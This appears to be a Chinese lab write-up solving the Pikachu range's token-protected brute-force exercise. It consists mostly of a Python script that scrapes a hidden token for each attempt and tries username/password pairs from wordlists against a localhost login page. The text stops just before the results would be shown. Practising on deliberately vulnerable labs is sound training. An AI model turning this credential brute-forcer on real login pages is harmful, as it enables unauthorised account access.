这里写pikachu靶场token防爆破的第二种解法

用python脚本跑，下面是代码

import requests
from bs4 import BeautifulSoup

# url填自己的url
url = 'http://localhost:8086/pikachu-master/vul/burteforce/bf_token.php'
# 取出账号字典里的值，1.txt就是账号字典
with open('1.txt', 'r', encoding="utf-8") as u:
    for username in u:
        # 取出密码字典里的值，2.txt就是密码字典
        with open('2.txt', 'r', encoding="utf-8") as p:
            for password in p:
                # 创建一个session对象
                r = requests.session()
                # 发起请求
                response = r.get(url)
                soup = BeautifulSoup(response.text, 'lxml')
                # 找到token并取出
                token = soup.find_all('input', type='hidden')[0]['value']
                # 构造payload
                payload = {
                    "username": username.strip(),
                    "password": password.strip(),
                    'token': token,
                    'submit': 'Login'
                }
                response = r.post(url, data=payload)
                soup = BeautifulSoup(response.text, 'lxml')
                # 判断如果登录成功，则打印用户名与密码，否则什么也不干
                if 'success' in soup.find_all('p')[0].text.strip():
                    print('用户名:', username.strip(), '\n密码', password.strip())

跑出来的结果为